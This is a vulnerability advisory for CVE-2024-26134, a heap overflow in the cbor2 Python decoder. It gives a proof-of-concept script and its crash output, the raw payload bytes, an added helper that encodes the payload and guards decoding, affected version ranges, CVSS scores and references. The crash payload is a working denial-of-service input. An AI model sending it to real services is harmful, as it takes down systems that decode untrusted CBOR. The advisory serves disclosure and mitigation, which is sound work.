CVE-2024-26134
HIGH 7.5 | EPSS 1.1% | Potential buffer overflow in CBOR2 decoder
Description
### Summary

Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarch64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86_64 laptop with Python 3.11; I suspect because there is still enough memory to allocate).

## Details

### PoC

```py
import concurrent.futures
import cbor2


def test():
    # Round-trip a 131128-character text string through the C decoder.
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)


# Run in a child process so the heap corruption surfaces as an abort
# instead of being masked by the interpreter.
with concurrent.futures.ProcessPoolExecutor() as executor:
    future = executor.submit(test)
    print(future.result())
```

```
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
```

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

```py
import cbor2


def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)


print(test())
```

```
Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error
```

### Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.
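The PoC above only shows the payload through `cbor2.dumps()`, so it is not obvious what actually reaches the decoder or how to tell whether a deployment is in the affected range. The following is an added example, not code from cbor2 or from the advisory: it builds the same 131128-byte text string by hand following the CBOR head encoding of RFC 8949, reads the declared length back out of the head, checks a version string against the PyPI range given under "Affected packages" (>= 5.5.1, < 5.6.2), and applies a pre-decode size guard for untrusted input. The function names, the `max_len` limit and the lenient version parser are assumptions for illustration; the guard is a stop-gap for services that cannot upgrade immediately, not a fix.

```python
# Added example (not part of cbor2 or the advisory). Encodes the PoC payload
# by hand per RFC 8949, inspects the CBOR head, checks the advisory's affected
# version range, and guards the declared top-level string length before
# handing bytes to cbor2.loads(). All names here are hypothetical.
import struct

# CBOR major types (RFC 8949 section 3.1)
MAJOR_BYTES = 2
MAJOR_TEXT = 3

# Affected PyPI range from the advisory's "Affected packages" list.
AFFECTED_FROM = (5, 5, 1)   # inclusive
FIXED_IN = (5, 6, 2)        # exclusive


def cbor_head(major: int, argument: int) -> bytes:
    """Initial byte(s) of a definite-length CBOR item: major type in the top
    3 bits, then the argument inline (< 24) or as a 1/2/4/8-byte big-endian value."""
    if argument < 24:
        return bytes([(major << 5) | argument])
    if argument < 1 << 8:
        return bytes([(major << 5) | 24]) + struct.pack(">B", argument)
    if argument < 1 << 16:
        return bytes([(major << 5) | 25]) + struct.pack(">H", argument)
    if argument < 1 << 32:
        return bytes([(major << 5) | 26]) + struct.pack(">I", argument)
    return bytes([(major << 5) | 27]) + struct.pack(">Q", argument)


def encode_text(s: str) -> bytes:
    """Encode a Python str as a definite-length CBOR text string (major type 3)."""
    payload = s.encode("utf-8")
    return cbor_head(MAJOR_TEXT, len(payload)) + payload


def poc_payload() -> bytes:
    """The bytes the advisory's PoC passes to cbor2.loads(): 0x7a + 4-byte
    length 0x00020038 (131128) followed by 131128 'x' bytes."""
    return encode_text("x" * 131128)


def declared_length(data: bytes):
    """Read only the first item's head. Returns (major, argument); argument is
    the string/array/map length (or integer value) for a definite-length head
    and None for indefinite-length (31) or reserved (28-30) heads."""
    if not data:
        raise ValueError("empty input")
    major = data[0] >> 5
    info = data[0] & 0x1F
    if info < 24:
        return major, info
    widths = {24: ">B", 25: ">H", 26: ">I", 27: ">Q"}
    if info in widths:
        fmt = widths[info]
        n = struct.calcsize(fmt)
        if len(data) < 1 + n:
            raise ValueError("truncated head")
        return major, struct.unpack(fmt, data[1:1 + n])[0]
    return major, None


def parse_version(v: str) -> tuple:
    """'5.6.1' -> (5, 6, 1). Pre-release/local suffixes are dropped (assumption:
    good enough for a release check, not a full PEP 440 parser)."""
    parts = []
    for piece in v.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True if the installed cbor2 version falls in the advisory's PyPI range."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_IN


def exceeds_limit(data: bytes, max_len: int) -> bool:
    """True if the top-level item is a byte/text string declaring more than max_len bytes."""
    major, length = declared_length(data)
    return major in (MAJOR_BYTES, MAJOR_TEXT) and length is not None and length > max_len


def guard_string_length(data: bytes, max_len: int) -> bytes:
    """Mitigation for untrusted input only: rejects oversized top-level strings.
    It does not fix the bug (upgrade to cbor2 >= 5.6.2) and ignores nested items."""
    if exceeds_limit(data, max_len):
        raise ValueError("declared string length exceeds limit %d" % max_len)
    return data


def safe_loads(data: bytes, max_len: int = 65536):
    """Apply the guard, then decode with cbor2 (imported lazily so the guard
    itself has no dependency)."""
    guard_string_length(data, max_len)
    import cbor2
    return cbor2.loads(data)
```

On the wire the PoC is just a five-byte head (`7a 00 02 00 38`) followed by the string body, so any network-facing service that decodes attacker-supplied CBOR with an affected cbor2 can be hit without the attacker ever running cbor2 themselves. Checking the declared length of the outer item is cheap and catches this specific reproducer, but large strings nested inside arrays or maps pass the guard untouched, which is why the version check and an upgrade are the real remediation.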
Affected packages (3)
- Debian/cbor2: from 0, < 5.6.2-1
- PyPI/cbor2: >= 5.5.1, < 5.6.2
- PyPI/cbor2 (git commit range): from 387755eacf0be35591a478d3c67fe10618a6d542 (the introducing commit named in the description), < 4de6991ba29bf2290d7b9d83525eda7d021873df; release range >= 5.5.1, < 5.6.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH (7.5) | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
References (15)
- ADVISORY: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/
- ADVISORY: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/
- ADVISORY: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2024-26134
- ADVISORY: https://security-tracker.debian.org/tracker/CVE-2024-26134
- PATCH: https://github.com/agronholm/cbor2
- WEB: https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542
- WEB: https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df
- WEB: https://github.com/agronholm/cbor2/pull/204
- WEB: https://github.com/agronholm/cbor2/releases/tag/5.6.2
- WEB: https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m
- WEB: https://github.com/pypa/advisory-database/tree/main/vulns/cbor2/PYSEC-2024-155.yaml
- WEB: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5
- WEB: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ
- WEB: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY